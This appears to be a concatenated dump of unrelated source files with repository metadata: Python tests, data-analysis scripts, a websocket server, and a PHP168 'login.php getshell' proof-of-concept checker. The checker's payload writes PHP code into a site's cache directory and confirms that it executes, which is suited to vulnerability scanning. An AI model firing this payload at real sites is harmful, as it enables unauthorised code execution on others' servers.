and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the
Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
from sqlalchemy import Column, Integer, String, Boolean, DateTime
from programy.storage.stores.sql.base import Base
from programy.storage.stores.utils import DAOUtils
class Link(Base):
__tablename__ = 'links'
id = Column(Integer, primary_key=True)
primary_user = Column(String(16))
generated_key = Column(String(256))
provided_key = Column(String(256))
expired = Column(Boolean)
expires = Column(DateTime)
retry_count = Column(Integer)
def __repr__(self):
return "<Linked(id='%s', primary_user='%s', provided_key='%s', generated_key='%s', expired='%s', expires='%s', retry_count='%d')>" % \
(DAOUtils.valid_id(self.id), self.primary_user, self.provided_key, self.generated_key, self.expired, self.expires, self.retry_count)
| [
"[email protected]"
] | |
e7e44f6c501f1455b389ef57e85fc9f635efc6a2 | b0ddd37a614556785b2ecd3d408357fd010ed72f | /test/test_py2vega.py | 61017752de6e06bfb281d05b43ba4bed2c5c5854 | [
"BSD-3-Clause"
] | permissive | codeaudit/py2vega | 837c9b347f4968956656fcfbc15b2d69110e267f | a3a94bf7e29414a649b796e3202a5621befadbb3 | refs/heads/master | 2020-07-07T13:06:04.690110 | 2019-08-20T08:49:12 | 2019-08-20T08:49:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,294 | py | import pytest
from py2vega import py2vega
from py2vega.functions.math import isNaN
whitelist = ['value', 'x', 'y', 'height', 'width', 'row', 'column']
def test_nameconstant():
code = 'False'
assert py2vega(code, whitelist) == 'false'
code = 'True'
assert py2vega(code, whitelist) == 'true'
code = 'None'
assert py2vega(code, whitelist) == 'null'
def test_num():
code = '36'
assert py2vega(code, whitelist) == '36'
def test_str():
code = '\'white\''
assert py2vega(code, whitelist) == '\'white\''
def test_tuple():
code = '(True, 3, \'hello\')'
assert py2vega(code, whitelist) == '[true, 3, \'hello\']'
code = '((True, 3, \'hello\'), 3)'
assert py2vega(code, whitelist) == '[[true, 3, \'hello\'], 3]'
def test_list():
code = '[True, 3, \'hello\']'
assert py2vega(code, whitelist) == '[true, 3, \'hello\']'
def test_dict():
code = '{\'hello\': 3, \'there\': 4}'
assert py2vega(code, whitelist) == '{\'hello\': 3, \'there\': 4}'
code = '{\'hello\': 3, \'there\': 4}'
assert py2vega(code, whitelist) == '{\'hello\': 3, \'there\': 4}'
def test_unary():
code = 'not value'
assert py2vega(code, whitelist) == '!(value)'
code = '-value'
assert py2vega(code, whitelist) == '-value'
code = '+value'
assert py2vega(code, whitelist) == '+value'
def test_binary():
code = 'value or 3'
assert py2vega(code, whitelist) == 'value || 3'
code = 'value and 3'
assert py2vega(code, whitelist) == 'value && 3'
code = 'value + 3'
assert py2vega(code, whitelist) == 'value + 3'
code = 'value**3'
assert py2vega(code, whitelist) == 'pow(value, 3)'
def test_ternary():
code = '3 if value else 4'
assert py2vega(code, whitelist) == 'value ? 3 : 4'
def test_compare():
code = '3 < value <= 4'
assert py2vega(code, whitelist) == '3 < value <= 4'
code = 'value in (\'ford\', \'chevrolet\')'
assert py2vega(code, whitelist) == 'indexof([\'ford\', \'chevrolet\'], value) != -1'
code = '\'chevrolet\' in value'
assert py2vega(code, whitelist) == 'indexof(value, \'chevrolet\') != -1'
code = '\'chevrolet\' not in value'
assert py2vega(code, whitelist) == 'indexof(value, \'chevrolet\') == -1'
def foo(value):
return 'red' if value < 150 else 'green'
def test_function():
assert py2vega(foo, whitelist) == 'value < 150 ? \'red\' : \'green\''
def test_whitelist():
with pytest.raises(NameError):
py2vega('my_variable')
assert py2vega('my_variable', ['my_variable']) == 'my_variable'
# Vega constants are accessible by default
assert py2vega('PI') == 'PI'
def bar():
return isNaN(3)
def test_math():
assert py2vega(bar) == 'isNaN(3)'
def invalid_func1():
print(3)
def test_invalid1():
with pytest.raises(RuntimeError):
py2vega(invalid_func1)
def test_invalid2():
with pytest.raises(RuntimeError):
py2vega(lambda value: value)
def conditional_func(value):
if value < 3:
return 'red'
elif value < 5:
return 'green'
else:
return 'yellow'
def test_if_stmt():
assert py2vega(conditional_func, whitelist) == "if(value < 3, 'red', if(value < 5, 'green', 'yellow'))"
def assign_func1(value):
val = ('USA', 'Japan')
return 'red' if value in val else 'green'
def assign_func2(value):
a = 'green'
b = 'red'
return a if value < 3 else b
def assign_func3(value):
a = 'green'
a = 'red'
return a
def assign_func4(value):
a = 'green'
b = a
return b
def assign_func5(value):
a = b = 'Hello'
return (a, b)
def assign_func6(value):
a = 'Hello'
b = a
a = 'World'
return b
def test_assign1():
assert py2vega(assign_func1, whitelist) == "indexof(['USA', 'Japan'], value) != -1 ? 'red' : 'green'"
def test_assign2():
assert py2vega(assign_func2, whitelist) == "value < 3 ? 'green' : 'red'"
def test_assign3():
assert py2vega(assign_func3, whitelist) == "'red'"
def test_assign4():
assert py2vega(assign_func4, whitelist) == "'green'"
def test_assign5():
assert py2vega(assign_func5, whitelist) == "['Hello', 'Hello']"
def test_assign6():
assert py2vega(assign_func6, whitelist) == "'Hello'"
| [
"[email protected]"
] | |
d771baddfaa09a4c3db22756b3f490f38382cbf3 | afada51a34ebc932fc9ca824ecf56aae04e3d74b | /lib/enrichment_modules.py | b74c4fce6db72594a14b0b79acb4fe6ac996284c | [] | no_license | SkBlaz/CBSSD | 0ec8c7e3fc2765d4897b650f584e97afabf7c4f6 | 3043a76c7065fa0f13770f38d3b7b3f661a9f117 | refs/heads/master | 2021-01-01T19:53:21.190536 | 2019-02-01T06:31:23 | 2019-02-01T06:31:23 | 98,710,089 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,931 | py | ##### this pyton code enables enrichment calculation from graph results from previous step
## this is to calculate enrichment scores
from scipy.stats import fisher_exact
import multiprocessing as mp
import random
from statsmodels.sandbox.stats.multicomp import multipletests
from collections import defaultdict, Counter
from .parsers import parse_gaf_file,read_termlist,read_topology_mappings,read_uniprot_GO
import pandas as pd
def calculate_pval(term):
# _partition_name,_partition_entries,term,_map_term_database,_number_of_all_annotated
## this calculates p value
#print(component, term_dataset, term, count_all)
query_term = term[0]
query_term_count_population = term[1]
inside_local = 0
outside_local = 0
for x in _partition_entries:
terms = _map_term_database[x]
if query_term in terms:
inside_local+=1
else:
outside_local+=1
query_counts = [inside_local, query_term_count_population]
pop_counts = [outside_local, _number_of_all_annotated-query_term_count_population]
p_value = fisher_exact([query_counts,pop_counts])[1]
return p_value
def multiple_test_correction(input_dataset):
from statsmodels.sandbox.stats.multicomp import multipletests
pvals = defaultdict(list)
with open(input_dataset) as ods:
for line in ods:
try:
component, term, pval = line.split()
pvals[component].append((term,pval))
except:
pass
print ("Component_by_size PFAM_term pvalue")
for key, values in pvals.items():
tmpP = [float(val[1]) for val in values]
termN = [val[0] for val in values]
significant, pvals, sidak, bonf = multipletests(tmpP,method="hs",is_sorted=False,returnsorted=False)
## Holm Sidak
output = zip(termN,significant,pvals,tmpP)
for term,significant,pval,tmp in output:
if (significant == True):
print (key,term,significant,tmp,pval)
def parallel_enrichment(term):
pval = calculate_pval(_term_database[term])
return {'observation' : _partition_name,'term' : _term_database[term][0],'pval' : pval}
def compute_enrichment(term_dataset, term_database, topology_map, all_counts, whole_term_list=False):
if whole_term_list:
tvals = set.union(*[x for x in topology_map.values()])
topology_map = {}
topology_map['1_community'] = tvals
global _partition_name
global _partition_entries
global _term_database
global _map_term_database
global _number_of_all_annotated
_number_of_all_annotated = all_counts
_term_database = {en : x for en, x in enumerate(term_database.items())} ## database of all annotations
_map_term_database = term_dataset ## entry to acc mappings
finalFrame = pd.DataFrame()
for k, v in topology_map.items():
print("Computing enrichment for partition {}".format(k))
## reassign for parallel usage
_partition_name = k
_partition_entries = v
## computational pool instantiation
ncpu = 2 #mp.cpu_count()
pool = mp.Pool(ncpu)
## compute the results
n = len(term_database)
step = ncpu ## number of parallel processes
jobs = [range(n)[i:i + step] for i in range(0, n, step)] ## generate jobs
## result container
tmpframe = pd.DataFrame(columns=['observation','term','pval'])
results = [parallel_enrichment(x) for x in range(n)]
# for batch in jobs:
# results = pool.map(parallel_enrichment,batch)
tmpframe = tmpframe.append(results,ignore_index=True)
## multitest corrections on partition level
significant, p_adjusted, sidak, bonf = multipletests(tmpframe['pval'],method="fdr_bh",is_sorted=False, returnsorted=False, alpha=0.05)
tmpframe['corrected_pval_fdr_bh'] = pd.Series(p_adjusted)
tmpframe['significant'] = pd.Series(significant)
tmpframe = tmpframe[tmpframe['significant'] == True]
finalFrame = finalFrame.append(tmpframe,ignore_index=True)
return finalFrame
if __name__ == "__main__":
print("Starting enrichment analysis..")
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("--filename",default="./test.txt")
parser.add_argument("--filename_mappings",default="./test.txt")
args = parser.parse_args()
## 1.) read the database.
term_dataset, term_database, all_counts = read_uniprot_GO(args.filename)
## 2.) partition function dict.
topology_map = read_topology_mappings(args.filename_mappings)
## 3.) calculate p-vals.
significant_results = compute_enrichment(term_dataset, term_database, topology_map, all_counts,whole_term_list=False)
significant_results.to_csv("../example_outputs/term_examples.txt",sep=" ",header=False)
| [
"[email protected]"
] | |
3e01df71c43a92672a6b4387ffcd0d505ed0ef01 | 6c219c027c7d0ef454bdeac196bd773e8b95d602 | /cms/php168/php168_login_getshell.py | 08224eb0012c6eed6e10a98c7606dfd32c336bc4 | [] | no_license | aStrowxyu/pocscan | 663f3a3458140e1bce7b4dc3702c6014a4c9ac92 | 08c7e7454c6b7c601bc54c21172c4788312603b1 | refs/heads/master | 2020-04-19T10:00:56.569105 | 2019-01-29T09:31:31 | 2019-01-29T09:31:31 | 168,127,418 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,581 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: PHP168 login.php GETSHELL漏洞
referer: http://wooyun.org/bugs/wooyun-2014-050515
author: Lucifer
description: Powered by php168 v6或者一下版本v5、v4、v3、v2、v1会搜索到很多很多相关的网站,login.php文件可以把代码写入cache目录中。
'''
import sys
import requests
import warnings
from termcolor import cprint
class php168_login_getshell_BaseVerify():
def __init__(self, url):
self.url = url
def run(self):
headers = {
"User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
}
payload = "/login.php?makehtml=1&chdb[htmlname]=404.php&chdb[path]=cache&content=<?php%20echo%20md5(1234);?>"
vulnurl = self.url + payload
try:
req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
verifyurl = self.url + "/cache/404.php"
req2 = requests.get(verifyurl, headers=headers, timeout=10, verify=False)
if r"81dc9bdb52d04dc20036dbd8313ed055" in req2.text:
cprint("[+]存在PHP168 GETSHELL漏洞...(高危)\tpayload: "+verifyurl, "red")
else:
cprint("[-]不存在php168_login_getshell漏洞", "white", "on_grey")
except:
cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
if __name__ == "__main__":
warnings.filterwarnings("ignore")
testVuln = php168_login_getshell_BaseVerify(sys.argv[1])
testVuln.run() | [
"[email protected]"
] | |
86024511a554590ea7ae122070eab0f619c43d93 | 4fd5860beb1e6809eee297509bcc776dfca40aca | /event_synchronization_analysis/ed_lf_es_mc.py | cab4b7d9f4e05674b37592ab836218dde4a38ed7 | [] | no_license | manmeet3591/fingerprint-volcano-enso-im | 40a41eca517abdd09079feb7ae58cc866343d6a8 | 21f39125ece4d03c5ee2961e4aae3768ee61cdb8 | refs/heads/master | 2021-07-05T09:49:28.858614 | 2021-04-19T02:55:45 | 2021-04-19T02:55:45 | 229,057,834 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,004 | py |
# coding: utf-8
# In[1]:
from __future__ import print_function, division
get_ipython().run_line_magic('matplotlib', 'inline')
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import seaborn as sns
import datetime as dt
import warnings
import random
warnings.filterwarnings("ignore")
sns.set()
# In[2]:
nino3 = np.genfromtxt ('tas_Amon_IPSL-CM5A-LR_past1000_r1i1p1_0850_1850_1_nino3_tseries.csv', delimiter=",")
ismr = np.genfromtxt ('pr_Amon_IPSL-CM5A-LR_past1000_r1i1p1_0850_1850_india_goswami_2002_tseries.csv', delimiter=",")
vrf = np.genfromtxt ('sigl.txt', delimiter=",")
print(nino3.shape)
print(ismr.shape)
print(vrf.shape)
# In[3]:
def common_time_axis(dismr, verbose=True):
"""
Generates common time axis for Nino3 and ISMR time series.
"""
# generate the time axis
Nt = len(dismr)
time = [dt.datetime(850, 1, 15)]
for i in range(1, len(dismr)):
y = time[i - 1].year
m = time[i - 1].month
if m == 12:
y += 1
m = 0
time.append(dt.datetime(y, m + 1, 15))
time = np.array(time)
return time
def yearly_time_axis(dvolc, verbose=True):
"""
Generates time axis for yearly data
"""
Nt = len(dvolc)
time = [dt.datetime(900, 1, 15)]
for i in range(1, len(dvolc)):
y = time[i - 1].year
y += 1
time.append(dt.datetime(y, 1, 15))
time = np.array(time)
return time
def moving_average_anomaly(dismr,n=360):
"""
Generates moving average anomaly of long time series
"""
#print(dismr.shape)
dismr_anom = np.zeros((dismr.shape[0]))
dismr_std = np.zeros((dismr.shape[0]))
dismr_anom[0:n/2] = ( dismr[0:n/2] - np.mean(dismr[0:n]) )/np.std(dismr[0:n])
dismr_anom[dismr.shape[0]-n/2:] = ( dismr[dismr.shape[0]-n/2:] - np.mean(dismr[dismr.shape[0]-n:]) )/np.std(dismr[dismr.shape[0]-n:])
#print(dismr_anom)
dismr_std[0:n/2] = np.std(dismr[0:n])
dismr_std[dismr.shape[0]-n/2:] = np.std(dismr[dismr.shape[0]-n:])
for i in range(np.int(n/2),np.int(dismr.shape[0]-n/2)):
dismr_anom[i] = (dismr[i] - np.mean(dismr[i-n/2:i+n/2]))/np.std(dismr[i-n/2:i+n/2])
dismr_std[i] = np.std(dismr[i-n/2:i+n/2])
return dismr_anom, dismr_std
def EventSync(es1, es2, taumax):
"""
Compute non-vectorized event synchronization
:type es1: 1D Numpy array
:arg es1: Event series containing '0's and '1's
:type es2: 1D Numpy array
:arg es2: Event series containing '0's and '1's
:float return: Event synchronization es2 to es1
"""
ex = np.arange(len(es1))[es1 == 1]
ey = np.arange(len(es2))[es2 == 1]
lx = len(ex)
ly = len(ey)
count = 0
if lx!=0 and ly!=0:
for m in range(1, lx-1):
for n in range(1, ly-1):
dst = ex[m] - ey[n]
if abs(dst) > taumax:
continue
elif dst == 0:
count += 0.5
continue
# finding the dynamical delay tau
tmp = ex[m+1] - ex[m]
if tmp > ex[m] - ex[m-1]:
tmp = ex[m] - ex[m-1]
tau = ey[n+1] - ey[n]
if tau > ey[n] - ey[n-1]:
tau = ey[n] - ey[n-1]
if tau > tmp:
tau = tmp
tau = tau / 2
if dst > 0 and dst <= tau:
count += 1
#print("count = ",count)
#print("Q = ",np.sqrt((lx-2) * (ly-2)))
#print("lx,ly,Q =",lx,ly,count)
if lx!=0 and ly!=0:
return count / np.sqrt((lx) * (ly))
#return count / np.sqrt((lx-2) * (ly-2))
else:
return 0.0
def my_shuffle(array):
random.shuffle(array)
return array
# In[12]:
ismr_anom, ismr_std = moving_average_anomaly(ismr)
nino3_anom, nino3_std = moving_average_anomaly(nino3)
es_ismr_d = np.zeros((ismr_anom.shape[0]))
es_ismr_f = np.zeros((ismr_anom.shape[0]))
es_nino3_en = np.zeros((nino3_anom.shape[0]))
es_nino3_ln = np.zeros((nino3_anom.shape[0]))
es_ismr_f[ismr_anom>1.0] = 1.0
es_ismr_d[ismr_anom<-1.0] = 1.0
es_nino3_en[nino3_anom>0.5] = 1.0
es_nino3_ln[nino3_anom<-0.5] = 1.0
taumax = 24
# In[13]:
Q_hist_ed = np.zeros((es_ismr_d.shape[0]-taumax))
Q_hist_lf = np.zeros((es_ismr_d.shape[0]-taumax))
es_ismr_d_mc = my_shuffle(es_ismr_d)
es_ismr_f_mc = my_shuffle(es_ismr_f)
for i in range(es_ismr_d.shape[0]-taumax):
Q_hist_12 = EventSync(es_ismr_d[i:i+taumax], es_nino3_en[i:i+taumax], taumax)
Q_hist_21 = EventSync(es_nino3_en[i:i+taumax], es_ismr_d[i:i+taumax],taumax)
Q_hist_ed[i] = Q_hist_12 + Q_hist_21
Q_hist_12 = EventSync(es_ismr_f[i:i+taumax], es_nino3_ln[i:i+taumax], taumax)
Q_hist_21 = EventSync(es_nino3_ln[i:i+taumax], es_ismr_f[i:i+taumax],taumax)
Q_hist_lf[i] = Q_hist_12 + Q_hist_21
# In[15]:
np.savetxt("Q_hist_ed.csv", Q_hist_ed, delimiter=",")
np.savetxt("Q_hist_lf.csv", Q_hist_lf, delimiter=",")
# In[27]:
| [
"[email protected]"
] | |
03a9dfea771fb783bbd10950701d0049f6fa4eb3 | b76e39e535499704368eddc26237dc0016ef7d06 | /RailRites/allsiemensdriveprocessing.py | a9963fed91147d1a03a027d0f56cd7e4d6f3f9fa | [] | no_license | BUBAIMITRA2018/castersimulation | 0532e53df7d346c2824e577cc91cd0ac2ce4694c | eca5fddff5c0f33f785168f6b1e9f572c1622be0 | refs/heads/master | 2022-12-10T02:45:04.207196 | 2020-09-09T05:35:54 | 2020-09-09T05:35:54 | 260,110,682 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,309 | py |
from observable import *
import logging
from clientcomm_v1 import *
from readgeneral_v2 import *
logger = logging.getLogger("main.log")
threadlist = []
class AreaObserver:
def __init__(self, observable):
observable.register_observer(self)
def notify(self, *args, **kwargs):
for item in args[0]:
try:
# threading = multiprocessing.Process(target=self.callmotor2dprocess,args=(item))
thread = threading.Thread(target=self.callsiemendsdriveprocess, args=[item])
threadlist.append(thread)
except Exception as e:
level = logging.INFO
messege = "NOTIFY" + ":" + " Exception rasied(process): " + str(e.args) + str(e)
logger.log(level, messege)
def callsiemendsdriveprocess(self, item):
while True:
try:
item.driveprocess
except Exception as e:
level = logging.INFO
messege = "calldriveprocess" + ":" + " Exception rasied(process): " + str(e.args) + str(e)
logger.log(level, messege)
def __init__(self, alldevices, filename):
self.subject = Observable()
self.alldevices = alldevices
self.client = Communication()
self.sta_con_plc = self.client.opc_client_connect(filename)
self.observer = AreaObserver(self.subject)
self.readgeneral = ReadGeneral(self.sta_con_plc)
def process(self, filename):
try:
for area, devices in readkeyandvalues(self.alldevices):
areavalue = self.readgeneral.readsymbolvalue(area, 'S7WLBit', 'PA')
if areavalue == 1:
self.observer.notify(devices, filename)
for j in threadlist:
j.start()
except Exception as e:
level = logging.INFO
messege = "PROCCESS" + ":" + " Exception rasied(process): " + str(e.args) + str(e)
logger.log(level, messege)
def readkeyandvalues(alldevice):
siemensdrivedictionary = alldevice.allsiemensdrives.dictionary
areas = list(siemensdrivedictionary.keys())
n = 0
while n < len(areas):
area = areas[n]
devices = siemensdrivedictionary[area]
yield area,devices
n = n + 1
| [
"[email protected]"
] | |
29156ba1d65e04552c8a58d16cf74743e89ed231 | f820d23a92ea5050b9bd6d9eff346532bf64a950 | /cucumber.py | 5b8360d11e34242043045d1d1722155d084ada17 | [] | no_license | aidardarmesh/behave | af84cb42c6e7fa3b1b45ff1ed424341dba1aec62 | 64aa16af5ee8c0b8b68ce56fad6237abe81551ec | refs/heads/master | 2022-11-30T16:15:54.914006 | 2020-08-12T17:35:33 | 2020-08-12T17:35:33 | 287,071,653 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 92 | py | class Basket:
def __init__(self, initial_weight):
self.weight = initial_weight
| [
"[email protected]"
] | |
ee0bc5029cbb3d92a0311e726a37acbb4ac87617 | 6601acd5ba7aaaa11f8620df9509e951574373b4 | /aircraft_comparisons/make_1D_histograms.py | bbdbf982f6c812b8a0ea1ad7599d3578d647ec37 | [] | no_license | rachawker/Hawker_ACP_2021-UM_CASIM_paper | 852d07519e4c15791e38bdf8ba7ae4ee9ac3707c | ff3cdd0b1ff72b0fed477824679ab7da49976aa3 | refs/heads/main | 2023-04-07T20:23:16.738292 | 2021-04-22T13:07:22 | 2021-04-22T13:14:40 | 360,516,902 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,512 | py |
from __future__ import division
import matplotlib.gridspec as gridspec
import iris
#import iris.coord_categorisation
import iris.quickplot as qplt
import cartopy
import cartopy.feature as cfeat
import rachel_dict as ra
#import iris # library for atmos data
import cartopy.crs as ccrs
import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
import copy
import matplotlib.colors as cols
import matplotlib.cm as cmx
import matplotlib._cntr as cntr
from matplotlib.colors import BoundaryNorm
import netCDF4
import matplotlib.ticker as mticker
from cartopy.mpl.gridliner import LONGITUDE_FORMATTER, LATITUDE_FORMATTER
import os,sys
#scriptpath = "/nfs/a201/eereh/scripts/2D_maps_of_column_max_reflectivity/"
#sys.path.append(os.path.abspath(scriptpath))
import colormaps as cmaps
from matplotlib.patches import Polygon
from mpl_toolkits.basemap import Basemap
import sys
import UKCA_lib as ukl
import glob
import netCDF4 as nc
import scipy.ndimage
import rachel_lists as rl
air_up = ra.read_in_nc_variables(rl.air_updraft_file, rl.air_updraft_var)
air_TWC = ra.read_in_nc_variables(rl.air_TWC_file, rl.air_TWC_var)
air_CDNC = ra.read_in_nc_variables(rl.air_CDNC_file, rl.air_CDNC_var)
air_2ds = ra.read_in_nc_variables(rl.air_2ds_file,rl.air_2ds_var)
air_alt = ra.read_in_nc_variables(rl.air_alt_file,rl.air_alt_var)
air_iwc = ra.read_in_nc_variables(rl.air_iwc_file,rl.air_iwc_var)
air_lwc = ra.read_in_nc_variables(rl.air_lwc_file,rl.air_lwc_var)
air_temp = ra.read_in_nc_variables(rl.air_temp_file,rl.air_temp_var)
print len(air_up)
data_path = sys.argv[1]
model_path = data_path
TWC = ra.read_in_nc_variables(data_path+rl.TWC_3D_file,rl.TWC_3D_var)
TWC = TWC*1000
updrafts = ra.read_in_nc_variables(data_path+rl.UPDRAFT_3D_file,rl.UPDRAFT_3D_var)
print len(updrafts)
CDNC = ra.read_in_nc_variables(data_path+rl.CDNC_3D_file,rl.CDNC_3D_var)
CDNC = CDNC*1e-6
IWC = ra.read_in_nc_variables(data_path+rl.IWC_3D_file,rl.IWC_3D_var)
IWC=IWC*1000
LWC = ra.read_in_nc_variables(data_path+rl.LWC_3D_file,rl.LWC_3D_var)
LWC=LWC*1000
ALT = ra.read_in_nc_variables(data_path+rl.ALT_3D_file,rl.ALT_3D_var)
TEMP = ra.read_in_nc_variables(data_path+rl.TEMP_3D_file,rl.TEMP_3D_var)
ICE_NUMBER = ra.read_in_nc_variables(data_path+rl.ICE_NUMBER_3D_file,rl.ICE_NUMBER_3D_var)
ICE_NUMBER = ICE_NUMBER*1e-6
GRAUPEL_NUMBER = ra.read_in_nc_variables(data_path+rl.GRAUPEL_NUMBER_3D_file,rl.GRAUPEL_NUMBER_3D_var)
GRAUPEL_NUMBER = GRAUPEL_NUMBER*1e-6
SNOW_NUMBER = ra.read_in_nc_variables(data_path+rl.SNOW_NUMBER_3D_file,rl.SNOW_NUMBER_3D_var)
SNOW_NUMBER = SNOW_NUMBER*1e-6
TOTAL_ICE_NUMBER = ICE_NUMBER+GRAUPEL_NUMBER+SNOW_NUMBER
CDNC_cloud_base = ra.read_in_nc_variables(data_path+rl.CLOUD_BASE_DROPLET_NUMBER_2D_file, rl.CLOUD_BASE_DROPLET_NUMBER_var)
CDNC_cloud_base = CDNC_cloud_base*1e-6
updraft_cloud_base = ra.read_in_nc_variables(data_path+rl.CLOUD_BASE_UPDRAFT_2D_file, rl.CLOUD_BASE_UPDRAFT_var)
ra.plot_1d_histogram_aircraft_and_model(air_up,updrafts,'Updraft Speed (m/s)', 'Updrafts_1D_histogram_new_RC_data', model_path)
ra.plot_1d_histogram_aircraft_and_model(air_TWC,TWC,'TWC (g/kg)', 'TWC_1D_histogram_new_RC_data', model_path)
ra.plot_1d_histogram_aircraft_and_model(air_CDNC,CDNC,'CDNC (/cm^3)', 'CDNC_1D_histogram_new_RC_data', model_path)
ra.plot_1d_histogram_aircraft_and_model(air_CDNC,CDNC_cloud_base,'CDNC at cloud base (/cm^3)', 'CDNC_at_cloud_base_1D_histogram_new_RC_data', model_path)
TWC[TWC>3]=0
TWC[TWC==0]=np.nan
TWC = TWC[~np.isnan(TWC)]
ra.plot_1d_histogram_aircraft_and_model(air_TWC,TWC,'TWC (g/kg)', 'TWC_1D_histogram_new_RC_data_3gperkg_limit', model_path)
ra.plot_1d_histogram_aircraft_and_model(air_lwc,LWC,'LWC (g/kg)', 'LWC_CDP_1D_histogram_new_RC_data', model_path)
ra.plot_1d_histogram_aircraft_and_model(air_iwc,IWC,'IWC (g/kg)', 'IWC_NEVZOROV_1D_histogram_new_RC_data', model_path)
ra.plot_1d_histogram_aircraft_and_model(air_2ds,ICE_NUMBER,'Ice number / 2ds count (/cm^3)', 'ICE_CRYSTAL_NUMBER_1D_histogram_new_RC_data', model_path)
ra.plot_1d_histogram_aircraft_and_model(air_2ds,TOTAL_ICE_NUMBER,'Ice number / 2ds count (/cm^3)', 'TOTAL_ICE_NUMBER_1D_histogram_new_RC_data', model_path)
ra.plot_1d_histogram_aircraft_and_model(air_2ds,TOTAL_ICE_NUMBER[ALT<8000],'Ice number / 2ds count (<8000m) (/cm^3)', 'TOTAL_ICE_NUMBER_model_under_8000m_1D_histogram_new_RC_data', model_path)
| [
"[email protected]"
] | |
83c8ab86e6e3a8b6764880c6ff5d8c569fa8a7b8 | 2612f762ec75a0723a4d12ae1d63a30792e4c236 | /src/websocket_server/src/ws_ros.py~ | f804ffdceb5f6c972b0265f5cf2bc6bfa41642a3 | [] | no_license | aransena/catkin_ws | efdf1a52b7dbbefbfa9cb748630f7be1ffd7f628 | eae6b83c80803a718a8e41569d3b4e7c1c838926 | refs/heads/master | 2021-01-18T21:12:48.557260 | 2016-06-03T13:39:22 | 2016-06-03T13:39:22 | 52,208,927 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,602 | #!/usr/bin/env python
# sample code from http://iot-projects.com/index.php?id=websocket-a-simple-example
import rospy
from std_msgs.msg import String as ros_string
import tornado.httpserver
import tornado.websocket
import tornado.ioloop
import tornado.web
import json
pub = rospy.Publisher('websocket_server_msgs', ros_string)
outfile = open('data.txt', 'w')
class WSHandler(tornado.websocket.WebSocketHandler):
def check_origin(self, origin):
return True
def open(self):
print 'user is connected.\n'
def on_message(self, message):
print message
if len(message) > 10:
msg = json.loads(message)
json.dump(msg, outfile)
#print 'received message: %s\n' % json.loads(message)
pub.publish(str(message))
if message == "USER":
print "Responding..."
self.write_message(message) # + ' OK')
def on_close(self):
print 'connection closed\n'
application = tornado.web.Application([(r'/ws', WSHandler), ])
if __name__ == "__main__":
try:
pub = rospy.Publisher('websocket_server_msgs', ros_string)
rospy.init_node('websocket_server', anonymous=True)
rospy.loginfo("websocket_server started")
http_server = tornado.httpserver.HTTPServer(application)
try:
print(2)
#http_server.close_all_connections()
print(3)
except:
pass
http_server.listen(8888)
tornado.ioloop.IOLoop.instance().start()
except Exception,e:
print "Server Error ", e
pass
| [
"[email protected]"
] | ||
31e398f160b1e7e9561e782bfa7d7d1eb3c10ec1 | dea48ecac82d241e7960f52794eb8a29e5d2e428 | /jianzhioffer/二叉树/字符串验证是否树的前序遍历.py | 0947369b674e63e6e19fb50a48bf9bcedce51ce0 | [] | no_license | yxx94/2020- | e2302bed32c5d7d1e8b559ef378fc60408687934 | e63431cfc3d8c8903bb383144dd0c5ed5d71aa5c | refs/heads/master | 2020-09-03T09:04:08.795099 | 2019-09-19T08:12:51 | 2019-09-19T08:12:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 623 | py | # coding=utf-8
# 字符串验证是否树的前序遍历
'''
//遍历一边str[]
//如果不是"#"就会多出一个叶子结点,如果是"#"就会减少一个叶子结点
输入: "9,3,4,#,#,1,#,#,2,#,6,#,#"
输出: true
'''
class Solution(object):
def isValidSerialization(self, preorder):
res = 1 # 叶节点的个数
for val in preorder.split(','):
if not res:
return False
if val == "#":
res -= 1
else:
res += 1
return not res
s = Solution()
print(s.isValidSerialization('9,3,4,#,#,1,#,#,2,#,6,#,#'))
| [
"[email protected]"
] | |
2eed8db45422d9c88538efb423a9a4754c1887e2 | 3a21faa925e8a21ad5e0d6dedf3037cc52750cbd | /datasciencebox/tests/test_cluster.py | 89b93a7e9fa3876d1158ec3b5b928d7a7a92c6fe | [
"Apache-2.0"
] | permissive | yabebalFantaye/datasciencebox | 9e630f9ad9139a609d9d925ce4a3f29467bf661f | 9f57ae85a034357d5bc15a12f3ebd15930f33ff1 | refs/heads/master | 2021-01-15T18:14:01.730969 | 2015-09-06T05:42:23 | 2015-09-06T05:42:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 693 | py | import pytest
from datasciencebox.core.settings import Settings
from datasciencebox.core.cloud.cluster import Cluster
settings = Settings()
def test_cluster_from_to_list():
data = [{'id': 0, 'ip': '0.0.0.0'}, {'id': 1, 'ip': '1.1.1.1'}, {'id': 2, 'ip': '2.2.2.2'}]
cluster = Cluster.from_list(data, settings)
exported = cluster.to_list()
exported_ans = [{'id': 0,
'ip': '0.0.0.0'}, {'id': 1,
